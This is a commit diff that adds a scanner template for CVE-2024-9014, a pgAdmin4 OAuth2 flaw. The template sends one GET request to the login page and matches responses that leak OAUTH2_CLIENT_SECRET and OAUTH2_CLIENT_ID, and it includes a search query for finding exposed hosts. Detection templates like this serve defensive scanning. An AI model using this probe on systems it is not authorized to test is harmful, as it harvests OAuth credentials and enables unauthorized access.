add CVE-2024-9014 cvss-score 9.9
parent
59b48525c0
commit
9e10771435
|
@ -0,0 +1,40 @@
|
|||
id: CVE-2024-9014
|
||||
|
||||
info:
|
||||
name: pgAdmin4 - OAuth2 Authentication Bypass
|
||||
author: s4e-io
|
||||
severity: critical
|
||||
description: |
|
||||
pgAdmin4 versions 8.11 and earlier are vulnerable to a security flaw in OAuth2 authentication. This vulnerability allows an attacker to potentially obtain the client ID and secret, leading to unauthorized access to user data.
|
||||
reference:
|
||||
- https://github.com/EQSTLab/CVE-2024-9014
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2024-9014
|
||||
- https://github.com/pgadmin-org/pgadmin4/issues/7945
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 9.9
|
||||
cve-id: CVE-2024-9014
|
||||
cwe-id: CWE-522
|
||||
epss-score: 0.00043
|
||||
epss-percentile: 0.09595
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: true
|
||||
vendor: pgadmin-org
|
||||
product: pgadmin4
|
||||
fofa-query: "pgadmin4"
|
||||
tags: cve,cve2024,pgadmin,info-leak
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET /login?next=/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains_all(body, "<title>pgAdmin 4</title>", "OAUTH2_CLIENT_SECRET", "OAUTH2_CLIENT_ID")'
|
||||
- 'contains(content_type,"text/html")'
|
||||
- 'status_code == 200'
|
||||
condition: and
|
Loading…
Reference in New Issue